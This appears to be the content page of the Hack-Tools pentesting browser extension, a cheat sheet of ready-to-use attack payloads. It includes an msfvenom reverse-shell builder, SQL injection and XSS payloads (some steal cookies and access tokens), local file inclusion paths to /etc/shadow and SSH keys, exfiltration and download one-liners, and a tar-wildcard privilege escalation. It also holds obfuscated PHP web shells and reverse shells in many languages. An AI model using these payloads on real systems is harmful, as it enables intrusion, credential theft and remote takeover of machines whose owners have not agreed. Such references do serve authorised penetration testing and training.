Hack-Tools

- Contribute the project: https://github.com/LasCC/Hack-Tools

MSF Venom Builder

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

 

Payload

generic/shell_reverse_tcp

LHOST

LPORT

Encoder

Iterations

Bad Characters

Platform

Architecture

Nop's

Format

aspx-exe

Output File

MSF Venom Command

msfvenom -p generic/shell_reverse_tcp LHOST=10.10.13.37 LPORT=4444 -f aspx-exe

 

Launch Console & Load Handler

msfconsole -qx "use exploit/multi/handler; set PAYLOAD generic/shell_reverse_tcp; set LHOST 10.10.13.37; set LPORT 4444; run"

 

Load Handler Only

use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 10.10.13.37
set LPORT 4444
run

Exploit Feed RSS

Feed about > Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.

 

https://exploit-db.com/

https://tools.cisco.com/security/center/publicationListing.x

https://www.cve-search.org/

https://cxsecurity.com//

 

SQL Injection

SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things by tricking the application into sending unexpected SQL commands.

 

Number of column

MySQL/MSSQL/PGSQL

'UNION SELECT NULL,NULL,NULL -- -

 

ORACLE

'UNION SELECT NULL,NULL,NULL FROM DUAL -- -

 

MYSQL/MSSQL/PGSQL/ORACLE - (add +1 until you get an exception)

' UNION ORDER BY 1 -- -

 

 

Database enumeration

MySQL/MSSQL

' UNION SELECT @@version -- -

 

Oracle

' UNION SELECT banner from v$version -- -

 

Oracle(2nd method)

' UNION SELECT version from v$instance -- -

 

Postgres

' UNION SELECT version() -- -

 

 

Tablename enumeration

MySQL/MSSQL/Postgres

' UNION SELECT table_name,NULL from INFORMATION_SCHEMA.TABLES -- -

 

Oracle

' UNION SELECT table_name,NULL FROM all_tables  -- -

 

 

Column name enumeration

MySQL/MSSQL/Postgres

' UNION SELECT column_name,NULL from INFORMATION_SCHEMA.COLUMNS where table_name="X" -- -

 

Oracle

' UNION SELECT column_name,NULL FROM  where table_name="X"  -- -

 

 

Column values concatenation

MySQL/Postgres

' UNION SELECT concat(col1,':',col2) from table_name limit 1 -- -

 

MySQL(2nd method)

' UNION SELECT col1 ':' col2 from table_name limit 1 -- -

 

Oracle / Postgres

' UNION SELECT select col1 ||':'||col2, null FROM  where table_name="X"  -- -

 

MSSQL

' UNION SELECT col1+':'+col2,NULL from table_name limit 1 -- -

 

 

Conditional ( Error Based )

MySQL

' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -

 

Postgres

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -

 

Oracle

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -

 

MSSQL

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -

 

 

Time-Based

,(select * from (select(sleep(10)))a)

 

';WAITFOR DELAY '0:0:30'--

 

 

Generic Error Based Payloads

MySQL

' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') -- -

 

Postgres

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END -- -

 

Oracle

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual -- -

 

MSSQL

' UNION SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END -- -

 

 

Authentication Based Payloads

or true--

 

") or true--

 

') or true--

 

admin') or ('1'='1'--

 

admin') or ('1'='1'#

 

admin') or ('1'='1'/

 

 

Order by and UNION Based Payloads

1' ORDER BY 1--+

 

1' ORDER BY 2--+

 

1' ORDER BY 3--+

 

1' ORDER BY 1,2--+

 

1' ORDER BY 1,2,3--+

 

1' GROUP BY 1,2,--+

 

1' GROUP BY 1,2,3--+

 

' GROUP BY columnnames having 1=1 --

 

-1' UNION SELECT 1,2,3--+

 

' UNION SELECT sum(columnname ) from tablename --

 

-1 UNION SELECT 1 INTO @,@

 

-1 UNION SELECT 1 INTO @,@,@

 

1 AND (SELECT * FROM Users) = 1

 

' AND MID(VERSION(),1,1) = '5';

 

Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Data grabber for XSS

Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>

 

<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>

 

<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>

 

<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>

 

XSS in HTML/Applications

<script>alert('XSS')</script>

 

<scr<script>ipt>alert('XSS')</scr<script>ipt>

 

"><script>alert("XSS")</script>

 

"><script>alert(String.fromCharCode(88,83,83))</script>

 

<img src=x onerror=alert('XSS');>

 

<img src=x onerror=alert('XSS')//

 

<img src=x onerror=alert(String.fromCharCode(88,83,83));>

 

<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>

 

<img src=x:alert(alt) onerror=eval(src) alt=xss>

 

"><img src=x onerror=alert("XSS");>

 

"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

 

XSS in Markdown

[a](javascript:prompt(document.cookie))

 

[a](j a v a s c r i p t:prompt(document.cookie))

 

[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

 

[a](javascript:window.onerror=alert;throw%201)

 

XSS in SVG (short)

<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>

 

<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>

 

<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>

 

<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

 

Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');

 

Function('ale'+'rt(1)')();

 

new Function`alert`6``;

 

setTimeout('ale'+'rt(2)');

 

setInterval('ale'+'rt(10)');

 

Set.constructor('ale'+'rt(13)')();

 

Set.constructor`alert(14)```;

 

LFI

LFI stands for Local File Includes - it’s a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server.

Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

 

Directory traversal

foo.php?file=../../../../../../../etc/passwd

 

Copy the payloadURL encoded

 

PHP Wrapper php://file

/example1.php?page=expect://ls

 

Copy the payloadURL encoded

 

PHP Wrapper php://filter

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

 

Copy the payloadURL encoded

 

PHP Wrapper php://filter

http://example.com/index.php?page=http://evil.com/shell.txt

 

Copy the payloadURL encoded

 

Useful LFI files

Linux

/etc/passwd

 

/etc/shadow

 

/etc/issue

 

/etc/group

 

/etc/hostname

 

/etc/ssh/ssh_config

 

/etc/ssh/sshd_config

 

/root/.ssh/id_rsa

 

/root/.ssh/authorized_keys

 

/home/user/.ssh/authorized_keys

 

/home/user/.ssh/id_rsa

 

/proc/[0-9]*/fd/[0-9]*

 

/proc/mounts

 

/home/$USER/.bash_history

 

/home/$USER/.ssh/id_rsa

 

/var/run/secrets/kubernetes.io/serviceaccount

 

/var/lib/mlocate/mlocate.db

 

/var/lib/mlocate.db

 

 

Apache

/etc/apache2/apache2.conf

 

/usr/local/etc/apache2/httpd.conf

 

/etc/httpd/conf/httpd.conf

 

Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log

 

Debian/Ubuntu -> /var/log/apache2/access.log

 

FreeBSD -> /var/log/httpd-access.log

 

/var/log/apache/access.log

 

/var/log/apache/error.log

 

/var/log/apache2/access.log

 

/var/log/apache/error.log

 

 

MySQL

/var/lib/mysql/mysql/user.frm

 

/var/lib/mysql/mysql/user.MYD

 

/var/lib/mysql/mysql/user.MYI

 

 

Windows

/boot.ini

 

/autoexec.bat

 

/windows/system32/drivers/etc/hosts

 

/windows/repair/SAM

 

/windows/panther/unattended.xml

 

/windows/panther/unattend/unattended.xml

 

/windows/system32/license.rtf

 

File Transfer

Various method of data exfiltration and download from a remote machine.

 

Bash Upload 

# Upload file over HTTP (require HTTP service running on the attacker machine)

bash -c 'echo -e "POST / HTTP/0.9 $(<)" > /dev/tcp//'

 

# Exfiltrate file over TCP# Listen with Netcat on port + output redirection

nc -l -p > data

 

bash -c 'cat  > /dev/tcp//'

 

Bash Download 

# Send via netcat

nc -l -p  <

 

# Download file on the other machine

bash -c 'cat < /dev/tcp// > '

 

 

Netcat 

# Upload payload

nc -lnvp ; nc   <

 

# Download

nc   <

 

nc -lnvp  > file_saved

 

 

Python 

# Python3 HTTP Server

python3 -m http.server

 

# Python2 HTTP Server

python -m SimpleHTTPServer

 

 

SCP 

# Upload from local host to remote computer

scp  username@IP:~/destination

 

# Download from remote computer

 

scp user@IP:~/path_to_file file_saved 

Powershell handy commands

List of useful Powershell commands

 

System enumeration

systeminfo

 

Get-WmiObject Win32_ComputerSystem

 

echo "$env:COMPUTERNAME.$env:USERDNSDOMAIN"

 

List Security patches

Get-Hotfix -description "Security update"

 

wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn

 

Environment Variables

Get-ChildItem Env: | ft Key,Value

 

(over cmd.exe)

set

 

HTTP download (wget like)

Invoke-WebRequest "http://10.10.10.10/shell.exe" -OutFile "shell.exe"

 

Cmd compatible

certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe

 

WLAN enumeration

netsh wlan show profiles

 

netsh wlan show profile name="PROFILE-NAME" key=clear

 

Active Directory enumeration

Require Powerview.ps1

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

 

Domain enumeration

Get-NetDomain

 

List Forest Domains

Get-NetForestDomain

 

Domain SID

Get-DomainSID

 

Domain Policy

Get-DomainPolicy

 

Domain Organizational Units

Get-NetOU

 

List trusted Domains

Get-NetDomainTrust

 

GPO enumeration

GPO applied to the machine

Get-NetGPO -ComputerName computername.domain.com

 

Password enumeration

Last Password Set date

Get-UserProperty –Properties pwdlastset

 

Description of User object

Find-UserField -SearchField Description –SearchTerm “pass”

 

Computer enumeration

List Computers of the Domain

Get-NetComputer

 

List Pingable Hosts

Get-NetComputer -Ping

 

List Windows 7 Ultimate Computers

Get-NetComputer –OperatingSystem "Windows 7 Ultimate"

 

Admin groups and account enumeration

List Domain Admin members

Get-NetGroupMember -GroupName "Domain Admins"

 

List Admin Groups

Get-NetGroup *admin*

 

List Local Admins [need Administrative rights]

Get-NetLocalGroup –ComputerName PCNAME-001

 

Get groups of user [need Administrative rights]

Get-NetGroup –UserName "username"

 

ACL enumeration

User ACL

Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs

 

GPO modifications rights

Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}

 

Password reset rights

Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"

 

Local reconnaissance

Export user accounts with ldifde

ldifde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.ldf

 

Export user accounts with csvde

csvde -d "OU=THING,DC=CHANGE,DC=ME" -p subtree -f dump.csv

 

Active Directory scripts

Enumerate Domain Users

1$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
2$PDC = ($domainObj.PdcRoleOwner).Name
3$SearchString = "LDAP://"
4$SearchString += $PDC + "/"
5$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
6$SearchString += $DistinguishedName
7$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
8$objDomain = New-Object System.DirectoryServices.DirectoryEntry
9$Searcher.SearchRoot = $objDomain
10$Searcher.filter="samAccountType=805306368"
11
12# To search for specific user, uncomment below
13# $Searcher.filter="name=[user_name]"
14
15$Searcher.FindAll()
16Foreach($obj in $Result)
17{
18 Foreach($prop in $obj.Properties)
19 {
20 $prop
21 }
22 Write-Host "------------------------"
23}

Copy

Enumerate Domain Groups

1$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
2$PDC = ($domainObj.PdcRoleOwner).Name
3$SearchString = "LDAP://"
4$SearchString += $PDC + "/"
5$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
6$SearchString += $DistinguishedName
7$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
8$objDomain = New-Object System.DirectoryServices.DirectoryEntry
9$Searcher.SearchRoot = $objDomain
10$Searcher.filter="(objectClass=Group)"
11$Result = $Searcher.FindAll()
12Foreach($obj in $Result)
13{
14 $obj.Properties.name
15}

Copy

Enumerate Members of a Group

1$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
2$PDC = ($domainObj.PdcRoleOwner).Name
3$SearchString = "LDAP://"
4$SearchString += $PDC + "/"
5$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
6$SearchString += $DistinguishedName
7$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
8$objDomain = New-Object System.DirectoryServices.DirectoryEntry
9$Searcher.SearchRoot = $objDomain
10
11# change "Secret_Group" to correct group name
12$Searcher.filter="(name=Secret_Group)"
13$Result = $Searcher.FindAll()
14Foreach($obj in $Result)
15{
16 $obj.Properties.member
17}

Copy

Detect Service Principal Names

1$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
2$PDC = ($domainObj.PdcRoleOwner).Name
3$SearchString = "LDAP://"
4$SearchString += $PDC + "/"
5$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
6$SearchString += $DistinguishedName
7$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
8$objDomain = New-Object System.DirectoryServices.DirectoryEntry
9$Searcher.SearchRoot = $objDomain
10$Searcher.filter="serviceprincipalname=*http*" # change name as needed
11$Result = $Searcher.FindAll()
12Foreach($obj in $Result)
13{
14 Foreach($prop in $obj.Properties)
15 {
16 $prop
17 }
18}

Copy

Useful Linux command for your Penetration Testing

List of useful commands on Linux

SUID Commands

find / -user root -perm /4000 2>/dev/null

 

find / -perm -u=s -type f 2>/dev/null

 

find / -type f -name '*.txt' 2>/dev/null

 

find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid

 

getcap -r / 2>/dev/null

 

What version of the system ?

cat /etc/issue

 

cat /etc/*-release

 

cat /etc/lsb-release

 

cat /etc/redhat-release

 

What is its kernel version ?

cat /proc/version

 

uname -a

 

uname -mrs

 

rpm -q kernel

 

dmesg | grep Linux

 

ls /boot | grep vmlinuz

 

What is the environment variables ?

cat /etc/profile

 

cat /etc/bashrc

 

cat ~/.bash_profile

 

cat ~/.bashrc

 

cat ~/.bash_logout

 

env

 

set

 

Service settings, there is any wrong allocation?

cat /etc/syslog.conf

 

cat /etc/chttp.conf

 

cat /etc/lighttpd.conf

 

cat /etc/cups/cupsd.conf

 

cat /etc/inetd.conf

 

cat /etc/apache2/apache2.conf

 

cat /etc/my.conf

 

cat /etc/httpd/conf/httpd.conf

 

cat /opt/lampp/etc/httpd.conf

 

ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

 

Is there any cron jobs ?

crontab -l

 

ls -alh /var/spool/cron

 

ls -al /etc/ | grep cron

 

ls -al /etc/cron*

 

cat /etc/cron*

 

cat /etc/at.allow

 

cat /etc/at.deny

 

cat /etc/cron.allow

 

cat /etc/cron.deny

 

cat /etc/crontab

 

cat /etc/anacrontab

 

cat /var/spool/cron/crontabs/root

 

Other users host communication with the system ?

lsof -i

 

lsof -i :80

 

grep 80 /etc/services

 

netstat -antup

 

netstat -antpx

 

netstat -tulpn

 

chkconfig --list

 

chkconfig --list | grep 3:on

 

last

 

lastlog

 

How to port forward ?

FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

 

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

 

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

 

ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port

 

ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

 

mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

 

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay

 

mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)

 

backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc

 

localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

 

TAR wildcard cronjob privilege escalation

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh

 

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

 

touch "/var/www/html/--checkpoint=1"

TTY Spawn Shell

Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/bash")'

 

Fully Interactive TTY

All the steps to stabilize your shell

The first step:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.

Step two is:

export TERM=xterm

 

This will give us access to term commands such as clear.

Finally (and most importantly) we will background the shell using

Ctrl + Z

 

Back in our own terminal we use

stty raw -echo; fg

 

This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes

stty rows 38 columns 116

 

 

OS system spawn shell

echo os.system("/bin/bash")

 

Bash spawn shell

/bin/sh -i

 

Perl spawn shell

perl —e 'exec "/bin/sh";'

 

Ruby spawn shell

ruby: exec "/bin/sh"

 

Lua spawn shell

lua: os.execute("/bin/sh")

 

IRB spawn shell

exec "/bin/sh"

 

VI spawn shell

:!bash

 

VI(2) spawn shell

:set shell=/bin/bash:shell

 

Nmap spawn shell

!sh

PHP Reverse Shell

Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack.

Pentestmonkey's reverse shell

This script will make an outbound TCP connection to a hardcoded IP and port.

View the souce code

DownloadCopy

Basic RCE

When you have successfully uploaded your payload, just put your commands after the variable ?cmd= (ex: ?cmd=ls -la")

<?php system($_GET["cmd"]);?>

 

DownloadCopy

Web Shell

p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application.

Watch the preview

 Download Flozz's repository

Obfuscated PHP Web Shell

<?=`$_GET[0]`?>

 

Usage : http://target.com/path/to/shell.php?0=command

DownloadCopy

<?=`$_POST[0]`?>

 

Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"

DownloadCopy

<?=`{$_REQUEST['_']}`?>

 

Usage :

- http://target.com/path/to/shell.php?_=command

- curl -X POST http://target.com/path/to/shell.php -d "_=command" '

DownloadCopy

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>

 

Usage :

- http://target.com/path/to/shell.php?0=command

DownloadCopy

<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>

 

Usage :

- http://target.com/path/to/shell.php?_=function&__=argument

- http://target.com/path/to/shell.php?_=system&__=ls

 

 

Reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.

Bash

bash -c 'exec bash -i &>/dev/tcp// <&1'

 

Copy the reverse shellURL encoded

Zsh

zsh -c 'zmodload zsh/net/tcp && ztcp   && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

 

Copy the reverse shellURL encoded

Netcat

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc   >/tmp/f

 

Copy the reverse shellURL encoded

PHP

php -r '$sock=fsockopen(getenv(""),getenv(""));exec("/bin/sh -i <&3 >&3 2>&3");'

 

Copy the reverse shellURL encoded

PowerShell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

 

Copy the reverse shellURL encoded

Perl

perl -e 'use Socket;$i="$ENV{}";$p=$ENV{};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

 

Copy the reverse shellURL encoded

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

 

Copy the reverse shellURL encoded

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV[""],ENV[""]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

 

Copy the reverse shellURL encoded

Telnet

TF=$(mktemp -u); mkfifo $TF && telnet   0<$TF | /bin sh 1>$TF

 

https://chrome.google.com/webstore/detail/hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi

 https://chrome.google.com/webstore/detail/hackbar/ginpbkfigcoaokgflihfhhmglmbchinc